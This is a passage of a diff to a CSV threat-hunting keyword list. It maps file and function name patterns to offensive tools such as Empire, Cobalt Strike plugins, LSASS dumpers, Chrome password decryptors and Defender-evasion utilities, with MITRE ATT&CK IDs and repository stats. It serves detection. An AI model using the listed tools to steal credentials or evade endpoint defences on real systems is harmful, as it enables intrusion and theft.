T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decoy_document.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"*decrypt.py .\*.txt utf-16-le*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*decrypt.py .\*.txt utf-16-le*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" "*decrypt_chrome_password.py*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" -"*Decrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Decrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decrypt-chrome-passwords-main*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" -"*Decrypt-CipherText*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*DecryptNextCharacterWinSCP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*decryptteamviewer*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*DecryptWinSCPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Decrypt-CipherText*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*DecryptNextCharacterWinSCP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*decryptteamviewer*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*DecryptWinSCPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DeEpinGh0st/Erebus*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*deepinstinct/ContainYourself*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*deepinstinct/LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*deepinstinct/LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*deepinstinct/NoFilter*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" -"*deepsound2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*deepsound2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*deepzec*","offensive_tool_keyword","Github Username","Github Author of malicious scripts and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/deepzec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*defanger exclusion*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*defanger realtime*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*defanger signature*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*default_userpass_for_services_unhash*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*default_users_for_services_unhash.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*default_userpass_for_services_unhash*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*default_users_for_services_unhash.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*DefaultBeaconApi*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*DefaultCreds-cheat-sheet*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4664","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" +"*DefaultCreds-cheat-sheet*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z" "*--defaults-torrc*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" -"*DefenderCheck*","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","10","1918","340","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z" +"*DefenderCheck*","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","10","1919","340","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z" "*DefenderCheck.exe*","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 